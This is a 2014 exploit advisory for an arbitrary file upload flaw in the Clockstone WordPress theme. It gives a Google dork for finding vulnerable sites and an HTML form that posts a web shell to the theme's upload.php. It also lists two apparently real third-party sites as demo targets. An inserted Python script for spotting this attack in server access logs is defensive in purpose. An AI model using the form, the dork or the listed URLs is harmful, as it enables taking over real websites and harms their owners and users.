
WordPress theme clockstone Arbitrary File Upload Vulnerability

Author: Xtroj-EnTn, Published: 25-09-2014
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++



# Exploit Title : WordPress theme clockstone Arbitrary File Upload Vulnerability

# Author : Xtroj-EnTn

# Risk : High

# Vendor Homepage: [http://cmsmasters.net/]

# Class: Remote

# Software Link: [http://themeforest.net/item/clockstone-ultimate-wordpress-theme/306607]

# Google Dork: inurl:/wp-content/themes/clockstone


# Date: 24/09/2014

contact me: xtroj1entn@gmail.com


#++++++++++++++++++++++++++++++++++++++++++++++++++++++++



You can upload any file to your target.



Here is the attack code:
##############################################################
# Shell upload attack By Xtroj-EnTn:
# <form enctype="multipart/form-data" action="http://www.examplesite.com/wp-content/themes/clockstone/theme/functions/upload.php" method="post">
# <input type="text" name="url" value="./" />
# Please choose a file: <input name="uploadfile" type="file" />
# <input type="submit" value="Upload" />
# </form>
##############################################################

Click on upload, choose your shell, then click Upload. After that,
you will see on your screen the name of your uploaded file in hash form.
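
For defenders, one way to spot use of this endpoint in web server access logs. This is an added example, not part of the original advisory: it flags POST requests to the upload.php path shown above and later requests by the same client for hex-named PHP files under the theme directory. The combined log format, the hex-name pattern for "hash form", the storage location under the theme directory and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Endpoint named in the advisory, and the theme directory it lives in.
UPLOAD_PATH = "/wp-content/themes/clockstone/theme/functions/upload.php"
THEME_PREFIX = "/wp-content/themes/clockstone/"
# Apache/nginx "combined" access log format (assumed; adjust to your server).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)
# Assumption: "hash form" means a hex-named file; the advisory gives no exact format.
HEX_PHP_RE = re.compile(r"/[0-9a-f]{16,64}\.php$")

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Sep/2014:10:01:02 +0000] "POST /wp-content/themes/clockstone/theme/functions/upload.php HTTP/1.1" 200 32 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [25/Sep/2014:10:01:09 +0000] "GET /wp-content/themes/clockstone/theme/functions/0123456789abcdef0123456789abcdef.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [25/Sep/2014:10:02:00 +0000] "POST /wp-content/themes/clockstone//theme/functions/upload.php HTTP/1.1" 403 199 "-" "curl/7.30"',
    '198.51.100.9 - - [25/Sep/2014:10:03:00 +0000] "GET /wp-content/themes/clockstone/style.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def normalize(uri):
    """Drop the query string, percent-decode, collapse '//' and lowercase the path."""
    return re.sub(r"/+", "/", unquote(uri.split("?", 1)[0])).lower()

def find_upload_abuse(lines):
    """Return (line_no, client_ip, finding) tuples for suspicious requests."""
    findings, uploaders = [], set()
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = normalize(m["uri"])
        ip, status = m["ip"], int(m["status"])
        if m["method"] == "POST" and path == UPLOAD_PATH:
            accepted = 200 <= status < 300
            if accepted:
                uploaders.add(ip)  # remember the client for follow-up requests
            findings.append((n, ip, "upload-accepted" if accepted else "upload-rejected"))
        elif (ip in uploaders and status == 200
              and path.startswith(THEME_PREFIX) and HEX_PHP_RE.search(path)):
            findings.append((n, ip, "followup-php-request"))
    return findings

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

An "upload-accepted" finding followed by a "followup-php-request" from the same client is the pattern to escalate; "upload-rejected" shows the endpoint is being probed but a control answered first.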


Demo:



1. Upload the yourshell.php file to the site using the code:


http://smboardwalk.movsports.com/wp-content/themes/clockstone/theme/functions/upload.php
http://openvase.com/wp-content/themes/clockstone/theme/functions/upload.php

Greetz To:Hatem Dridi & Thnx to Allah
